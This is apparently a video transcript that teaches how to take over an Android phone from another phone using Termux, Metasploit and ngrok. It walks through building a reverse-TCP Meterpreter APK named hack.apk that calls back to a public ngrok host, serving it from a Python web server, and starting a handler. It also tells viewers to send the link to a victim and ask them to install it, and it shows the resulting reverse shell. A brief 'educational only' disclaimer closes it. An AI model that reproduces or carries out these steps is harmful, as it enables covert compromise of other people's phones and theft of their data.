Hello and welcome everyone. In this video, I'll be demonstrating how to hack an Android phone using another Android phone. So for that, we'll be installing a app which is available in our Play Store. So inside that app, we can run some of the Linux commands. So we'll install Metasploit framework inside that app, and also we'll need to set up a web server. So for that, we'll be installing Python, and we'll need the port forwarding method. So for that, we'll be require ngrok tool. So if you don't know how to install ngrok, so you can watch my this video. So where I have explained what is ngrok, what is port forwarding, and how to install ngrok. So you can watch this video. Go to Play Store and search for Termux. So this app will open up. So I have already installed this app. So you can install this app. So you can see this is the interface of Termux where we can run our Linux commands. Also, one important thing, while using ngrok for port forwarding, make sure your mobile hotspot is on. Otherwise, the port forwarding won't work. So first of all, I will set up my simple web server. So for that, I'll use python-m http.server command and press enter. So it will just set up a simple Python server, web server at port 8000. After the web server is set up, then swipe left and click on new session. Start our ngrok. So that is our port forwarding. So I'll just start my over here. I'm using two port forwarding methods. So one is TCP and another one is HTTP. So for HTTP, I'm using for web server, and TCP I'm using for the reverse connection. Then go to another tab, and then I'll create a payload which is APK file. So then we need to give the lhost. So in this case, our lhost will be just go to the ngrok interface, and the TCP one will be our lhost, so which is 4.tcp.ngrok.io. So I'll give, and the port will be the port will be 13991. So I'll give that, and I'll save this file as hack.apk. And so we can see the payload has been generated. So now I'll start MSF console. So now we can see the Metasploit framework has been started. I'll use multi/handler. Then I will set my lhost to localhost and set the L port to 4444. I'll set the payload as Android/Metapreter/reverse TCP, and I'll give exploit. So now we can see we have started the listener. Now we need to install the APK file in our phone. So I'll just install the APK file in my phone. As our web server is running on this link, so we can send this link to our victim and ask him to install the APK file. So I have downloaded and installed the hack.apk file in my phone. So we can see Metapreter session 1 opened. So it will give us a reverse shell. So you can see the reverse shell has been created. So I'll just give a help command, and so we can see, so we can run all of these commands in this session. So I will not be performing this one any of these commands. So you can watch my this video where I have successfully hacked Android phone and run some of these commands. So this is how we can hack Android phone using simply another Android phone. This exercise is only for educational purpose, so don't perform this exercise without anyone's permission. Thanks for watching this video. I hope you have enjoyed this video and subscribe to my channel.